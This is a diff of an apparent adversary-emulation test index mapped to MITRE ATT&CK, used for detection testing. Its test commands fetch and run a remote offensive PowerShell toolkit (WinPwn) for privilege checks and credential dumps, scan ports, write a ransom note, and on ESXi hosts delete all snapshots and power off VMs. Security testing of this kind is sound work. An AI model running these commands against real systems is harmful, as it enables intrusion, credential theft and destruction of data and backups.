@@ -103171,7 +104054,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           itm4nprivesc -noninteractive -consoleoutput
         name: powershell
@@ -103182,7 +104064,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           oldchecks -noninteractive -consoleoutput
         cleanup_command: |-
@@ -103199,7 +104080,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           otherchecks -noninteractive -consoleoutput
         name: powershell
@@ -103211,7 +104091,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Generalrecon -consoleoutput -noninteractive
         name: powershell
@@ -103223,7 +104102,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Morerecon -noninteractive -consoleoutput
         name: powershell
@@ -103235,7 +104113,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           RBCD-Check -consoleoutput -noninteractive
         name: powershell
@@ -103288,7 +104165,7 @@ discovery:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -103592,7 +104469,37 @@ discovery:
       - windows
       executor:
         name: command_prompt
-        command: powershell.exe -c "gdr -PSProvider 'FileSystem'"
+        command: 'powershell.exe -c "gdr -PSProvider ''FileSystem''"
+
+          '
+    - name: Discover OS Product Name via Registry
+      auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
+      description: |
+        Identify the Operating System Product Name via registry with the reg.exe command.
+        Upon execution, the OS Product Name will be displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
+          ProductName
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: Discover OS Build Number via Registry
+      auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
+      description: |
+        Identify the Operating System Build Number via registry with the reg.exe command.
+        Upon execution, the OS Build Number will be displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
+          CurrentBuildNumber
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1016.002:
     technique:
       modified: '2023-10-05T11:35:30.887Z'
@@ -104588,7 +105495,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -104896,7 +105803,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -104928,7 +105835,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -106778,7 +107685,59 @@ discovery:
       executor:
         name: command_prompt
         elevation_required: false
-        command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
+        command: 'PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
+
+          '
+    - name: Discover System Language with WMIC
+      auto_generated_guid: 4758003d-db14-4959-9c0f-9e87558ac69e
+      description: "WMIC (Windows Management Instrumentation Command-line) is a command-line
+        tool that provides a simplified interface to query and manage Windows system
+        configurations, processes, and hardware information using WMI. \n\nThe command
+        in this test retrieves information about the system's locale, operating system
+        language, and multilingual user interface (MUI) languages.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_host:
+          description: "The host that will be queried.\n\nIf the host contains special
+            characters, it may need to be wrapped in double quotes or double + single
+            quotes. \n\nFor example: \"DESKTOP-123\" or \"'DESKTOP-123'\".\n"
+          type: string
+          default: localhost
+        format_style:
+          description: You can specify multipe output formats for wmic such as table,
+            list and csv.
+          type: string
+          default: table
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'wmic /node:#{target_host} os get Locale,OSLanguage,MUILanguages
+          /format:#{format_style}
+
+          '
+    - name: Discover System Language with Powershell
+      auto_generated_guid: 1f23bfe8-36d4-49ce-903a-19a1e8c6631b
+      description: "This PowerShell script collects key system settings, such as the
+        UI language, user language preferences, system locale, current culture, UI
+        culture, and time zone, into a hash table. \n\nIt then outputs these settings
+        in a readable key-value format directly to the terminal. The script is simple
+        and efficient for quickly displaying system configuration details.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |-
+          $info = @{
+            UILanguage     = Get-WinUILanguageOverride
+            UserLanguages  = (Get-WinUserLanguageList).LanguageTag -join ', '
+            SystemLocale   = Get-WinSystemLocale
+            CurrentCulture = [System.Globalization.CultureInfo]::CurrentCulture.Name
+            CurrentUICulture = [System.Globalization.CultureInfo]::CurrentUICulture.Name
+            TimeZone       = (Get-TimeZone).Id
+          }
+          $info.GetEnumerator() | ForEach-Object { "$($_.Name): $($_.Value)" }
   T1012:
     technique:
       modified: '2023-04-03T18:56:37.011Z'
@@ -107405,7 +108364,7 @@ discovery:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -107417,7 +108376,7 @@ discovery:
         subscription_name:
           description: Azure subscription name to scan
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -107452,6 +108411,115 @@ discovery:
 
           '
         name: powershell
+    - name: AWS - Enumerate common cloud services
+      auto_generated_guid: aa8b9bcc-46fa-4a59-9237-73c7b93a980c
+      description: 'Upon successful execution, this test will enumerate common resources
+        that are contained within a valid AWS account.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        regions:
+          description: AWS regions
+          type: string
+          default: us-east-1,us-east-2,us-west-1,us-west-2
+        output_directory:
+          description: Directory to output results to
+          type: string
+          default: "$env:TMPDIR/aws_discovery"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $regions = "#{regions}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile
+          Get-AWSDiscoveryData -Regions $regions -OutputDirectory "#{output_directory}"
+          Remove-BlankFiles -OutputDirectory "#{output_directory}"
+        name: powershell
+    - name: Azure - Enumerate common cloud services
+      auto_generated_guid: 58f57c8f-db14-4e62-a4d3-5aaf556755d7
+      description: 'Upon successful execution, this test will enumerate common resources
+        that are contained within a valid Azure subscription.
+
+        '
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        client_id:
+          description: Azure AD client ID
+          type: string
+          default:
+        client_secret:
+          description: Azure AD client secret
+          type: string
+          default:
+        tenant_id:
+          description: Azure AD tenant ID
+          type: string
+          default:
+        cloud:
+          description: Azure cloud environment
+          type: string
+          default: AzureCloud
+        output_directory:
+          description: Directory to output results to
+          type: string
+          default: "$env:TMPDIR/azure_discovery"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Az module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Force
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"
+          $client_id = "#{client_id}"
+          $client_secret = "#{client_secret}"
+          $tenant_id = "#{tenant_id}"
+          $environment = "#{cloud}"
+          Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment
+          Get-AzureDiscoveryData -OutputDirectory "#{output_directory}" -Environment $environment
+          Remove-BlankFiles -OutputDirectory "#{output_directory}"
+        name: powershell
   T1018:
     technique:
       modified: '2023-08-14T19:08:59.741Z'
@@ -107756,7 +108824,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -107788,7 +108856,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -108234,7 +109302,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           spoolvulnscan -noninteractive -consoleoutput
         name: powershell
@@ -108246,7 +109313,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           MS17-10 -noninteractive -consoleoutput
         name: powershell
@@ -108259,7 +109325,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           bluekeep -noninteractive -consoleoutput
         name: powershell
@@ -108271,7 +109336,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           fruit -noninteractive -consoleoutput
         name: powershell
@@ -108322,7 +109386,9 @@ discovery:
       input_arguments:
         ip_address:
           description: IP-Address within the target subnet. Default is empty and script
-            tries to determine local IP address of attacking machine.
+            tries to determine local IP address of attacking machine. A comma separated
+            list of targe IPs is also accepted (useful to simulate a wider scan while
+            only scanning key host e.g., honeypots)
           type: string
           default: ''
         port_list:
@@ -108334,33 +109400,58 @@ discovery:
           type: string
           default: '200'
       executor:
-        command: |
+        command: |-
           $ipAddr = "#{ip_address}"
-          if ($ipAddr -eq "") {
-              # Assumes the "primary" interface is shown at the top
-              $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
-              Write-Host "[i] Using Interface $interface"
-              $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
-          }
-          Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
-          $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
-          # Always assumes /24 subnet
-          Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+          if ($ipAddr -like "*,*") {
+              $ip_list = $ipAddr -split ","
+              $ip_list = $ip_list.ForEach({ $_.Trim() })
+              Write-Host "[i] IP Address List: $ip_list"
 
-          $ports = #{port_list}
-          $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+              $ports = #{port_list}
 
-          foreach ($ip in $subnetIPs) {
-              foreach ($port in $ports) {
-                try {
-                    $tcp = New-Object Net.Sockets.TcpClient
-                    $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
-                } catch {}
-                if ($tcp.Connected) {
-                    $tcp.Close()
-                    Write-Host "Port $port is open on $ip"
-                }
+              foreach ($ip in $ip_list) {
+                  foreach ($port in $ports) {
+                      Write-Host "[i] Establishing connection to: $ip : $port"
+                      try {
+                          $tcp = New-Object Net.Sockets.TcpClient
+                          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                      } catch {}
+                      if ($tcp.Connected) {
+                          $tcp.Close()
+                          Write-Host "Port $port is open on $ip"
+                      }
+                  }
               }
+          } elseif ($ipAddr -notlike "*,*") {
+              if ($ipAddr -eq "") {
+                  # Assumes the "primary" interface is shown at the top
+                  $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+                  Write-Host "[i] Using Interface $interface"
+                  $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+              }
+              Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+              $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+              # Always assumes /24 subnet
+              Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+              $ports = #{port_list}
+              $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+              foreach ($ip in $subnetIPs) {
+                  foreach ($port in $ports) {
+                      try {
+                          $tcp = New-Object Net.Sockets.TcpClient
+                          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                      } catch {}
+                      if ($tcp.Connected) {
+                          $tcp.Close()
+                          Write-Host "Port $port is open on $ip"
+                      }
+                  }
+              }
+          } else {
+              Write-Host "[Error] Invalid Inputs"
+              exit 1
           }
         name: powershell
     - name: Remote Desktop Services Discovery via PowerShell
@@ -108377,6 +109468,41 @@ discovery:
           '
         name: powershell
         elevation_required: true
+    - name: Port Scan using nmap (Port range)
+      auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+      description: 'Scan multiple ports to check for listening ports with nmap
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        host:
+          description: Host(s) to scan.
+          type: string
+          default: 127.0.0.1
+        port_range:
+          description: Port range(s) to scan.
+          type: string
+          default: 0-65535
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if nmap command exists on the machine
+
+          '
+        prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
+          fi;
+
+          '
+        get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
+          pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
+      executor:
+        command: 'nmap -Pn -sV -p #{port_range} #{host}
+
+          '
+        elevation_required: true
+        name: sh
   T1518:
     technique:
       modified: '2024-04-16T00:16:06.689Z'
@@ -108473,7 +109599,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Dotnetsearch -noninteractive -consoleoutput
         name: powershell
@@ -108485,7 +109610,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           dotnet -consoleoutput -noninteractive
         name: powershell
@@ -108496,7 +109620,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           powerSQL -noninteractive -consoleoutput
         name: powershell
@@ -108812,6 +109935,20 @@ discovery:
 
           '
         name: command_prompt
+    - name: Discover System Time Zone via Registry
+      auto_generated_guid: 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47
+      description: |
+        Identify the Operating System Time Zone via registry with the reg.exe command.
+        Upon execution, the system Time Zone will be shown.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
+          /v TimeZoneKeyName
+
+          '
+        name: command_prompt
+        elevation_required: false
 resource-development:
   T1583:
     technique:
@@ -113615,7 +114752,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -113633,7 +114770,41 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1595.003
+    atomic_tests:
+    - name: Web Server Wordlist Scan
+      auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
+      description: 'This test will scan a target system with a wordlist of common
+        directories and file paths.
+
+        '
+      supported_platforms:
+      - windows
+      - linux
+      - macos
+      input_arguments:
+        target:
+          description: The target system to scan
+          type: string
+          default: http://localhost
+        wordlist:
+          description: The wordlist to use for scanning
+          type: path
+          default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
+        request_timeout:
+          description: The timeout for each request (in seconds)
+          type: integer
+          default: 5
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:TMPDIR/wordlist_scan.txt"
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
+          Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
+          Write-Host "Scan complete. Results saved to: #{output_file}"
+        name: powershell
   T1591.004:
     technique:
       x_mitre_platforms:
@@ -115479,6 +116650,48 @@ impact:
           Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
         name: powershell
         elevation_required: true
+    - name: ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
+      auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
+      description: |
+        Changes the ESXi welcome message to potentially display ransom information.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli system welcomemsg set -m ''RANSOMWARE-NOTIFICATION''"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1496.004:
     technique:
       modified: '2024-10-16T17:59:27.535Z'
@@ -116386,7 +117599,9 @@ impact:
           type: path
           default: "$env:temp\\test.txt"
       dependencies:
-      - description: 'GPG must exist at (#{GPG_Exe_Location})
+      - description: 'GPG must exist at (#{GPG_Exe_Location}). If -GetPrereqs fails,
+          try to install GPG4WIN manually at ''https://www.gpg4win.org/download.html''.
+          Once done, run -CheckPrereqs to confirm that it works.
 
           '
         prereq_command: 'if (test-path ''#{GPG_Exe_Location}''){exit 0} else {exit
@@ -116394,19 +117609,19 @@ impact:
 
           '
         get_prereq_command: |
+          Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text"  # Create the test.txt file
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
           invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
           cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
       executor:
         name: powershell
         elevation_required: false
-        command: 'cmd /c ''#{GPG_Exe_Location}'' -c ''#{File_to_Encrypt_Location}''
-
-          '
-        cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
-          silentlycontinue | out-null
-
-          '
+        command: |
+          Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text"  # Create the test.txt file again in case prereqs failed
+          cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"#{File_to_Encrypt_Location}`""
+        cleanup_command: |
+          Remove-Item -Path "#{File_to_Encrypt_Location}" -Force -ErrorAction SilentlyContinue
+          Remove-Item -Path "#{File_to_Encrypt_Location}.gpg" -Force -ErrorAction SilentlyContinue
     - name: Data Encrypt Using DiskCryptor
       auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
       description: 'DiskCryptor, an open source encryption utility, can be exploited
@@ -116475,7 +117690,7 @@ impact:
           echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt
-          echo "2. Paste this link — https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
+          echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt
           echo "" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
@@ -116944,10 +118159,53 @@ impact:
         prereq_command: 'stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
           terraform init
           terraform apply -auto-approve
+    - name: ESXi - Delete VM Snapshots
+      auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
+      description: |
+        Deletes all snapshots for all Virtual Machines on an ESXi Host
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
+          $1}''`; do vim-cmd vmsvc/snapshot.removeall $i & done"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1498:
     technique:
       modified: '2024-10-15T16:01:00.510Z'
@@ -117820,6 +119078,49 @@ impact:
           '
         name: command_prompt
         elevation_required: false
+    - name: ESXi - vim-cmd Used to Power Off VMs
+      auto_generated_guid: 622cc1a0-45e7-428c-aed7-c96dd605fbe6
+      description: |
+        Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
+          $1}''`; do vim-cmd vmsvc/power.off $i & done"
+
+          '
+        name: command_prompt
+        elevation_required: false
 initial-access:
   T1133:
     technique:
@@ -119956,7 +121257,6 @@ initial-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -119968,7 +121268,6 @@ initial-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -121122,7 +122421,7 @@ exfiltration:
           description: Set to '-b32' to use base32 encoding of data. Might be required
             by some DNS resolvers.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'DNSExfiltrator powershell file must exist on disk at specified
@@ -121140,6 +122439,45 @@ exfiltration:
